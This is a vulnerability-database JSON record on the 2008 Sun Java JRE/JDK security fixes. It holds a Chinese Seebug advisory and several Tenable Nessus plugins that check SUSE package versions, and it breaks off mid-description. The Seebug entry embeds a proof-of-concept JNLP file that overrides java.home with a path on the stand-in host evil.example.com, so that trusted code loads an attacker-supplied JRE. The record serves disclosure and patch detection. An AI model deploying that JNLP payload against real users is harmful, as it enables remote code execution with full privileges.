target=_blank>https://www.redhat.com/support/errata/RHSA-2008-1025.html</a>\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-246387\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-246387\uff1aA Security Vulnerability in the Java Runtime Environment may Allow Code Loaded From the Local Filesystem to Access LocalHost\r\n\u94fe\u63a5\uff1a<a href=http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1 target=_blank>http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n<a href=http://java.sun.com/javase/downloads/index.jsp target=_blank>http://java.sun.com/javase/downloads/index.jsp</a>\r\n<a href=http://java.sun.com/javase/downloads/index_jdk5.jsp target=_blank>http://java.sun.com/javase/downloads/index_jdk5.jsp</a>\r\n<a href=http://java.sun.com/j2se/1.4.2/download.html target=_blank>http://java.sun.com/j2se/1.4.2/download.html</a>\r\n<a href=http://java.sun.com/j2se/1.3/download.html target=_blank>http://java.sun.com/j2se/1.3/download.html</a>", "published": "2008-12-09T00:00:00", "title": "Sun Java JDK/JRE\u5b89\u5168\u66f4\u65b0\u4fee\u590d\u591a\u4e2a\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5355", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "modified": "2008-12-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4532", "id": "SSV:4532", "sourceData": "\n <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">\r\n <information>\r\n <title>Trusted Application</title>\r\n <vendor>Trusted Vendor</vendor>\r\n <description>Trusted Application by Trusted Vendor</description>\r\n <homepage href="http://trusted.example.org/" />\r\n <offline-allowed />\r\n </information>\r\n <security><all-permissions /></security>\r\n <resources>\r\n <j2se version="1.5+" />\r\n <!-- Next line overrides the JRE's java.home System property -->\r\n <property name="java.home" value="\\\\evil.example.com\\jre" />\r\n <jar href="signed-and-trusted-jce-dependent-library.jar" />\r\n </resources>\r\n <application-desc main-class="org.example.trusted.app.StartApp" />\r\n </jnlp>\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4532"}], "nessus": [{"lastseen": "2021-01-17T14:44:53", "description": "The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-01-07T00:00:00", "title": "openSUSE 10 Security Update : java-1_5_0-sun (java-1_5_0-sun-5875)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-01-07T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo"], "id": "SUSE_JAVA-1_5_0-SUN-5875.NASL", "href": "https://www.tenable.com/plugins/nessus/35305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-5875.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35305);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE 10 Security Update : java-1_5_0-sun (java-1_5_0-sun-5875)\");\n script_summary(english:\"Check for the java-1_5_0-sun-5875 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-alsa-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-demo-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-devel-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-plugin-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-src-1.5.0_update17-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun / java-1_5_0-sun-alsa / java-1_5_0-sun-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:18", "description": "The version update to SUN Java 1.4.2sr19 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : Sun Java (YOU Patch Number 12321)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12321.NASL", "href": "https://www.tenable.com/plugins/nessus/41263", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41263);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"SuSE9 Security Update : Sun Java (YOU Patch Number 12321)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.4.2sr19 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5343.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5344.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5345.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5347.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5349.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5354.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5355.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5358.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5360.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12321.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"java2-1.4.2-129.48\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"java2-jre-1.4.2-129.48\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:12", "description": "The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo"], "id": "SUSE_11_0_JAVA-1_5_0-SUN-081217.NASL", "href": "https://www.tenable.com/plugins/nessus/39997", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-375.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39997);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)\");\n script_summary(english:\"Check for the java-1_5_0-sun-375 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=456770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-alsa-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-demo-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-devel-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-plugin-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-src-1.5.0_update17-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun / java-1_5_0-sun-alsa / java-1_5_0-sun-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:50:05", "description": "The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. (244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its\n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security\n checks due to the manner in which it handles the\n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java\n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java\n application that is launched through the command line to\n elevate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar\n objects may allow an untrusted applet or application to\n elevate its privileges. (244991)\n\n - A buffer overflow affects the 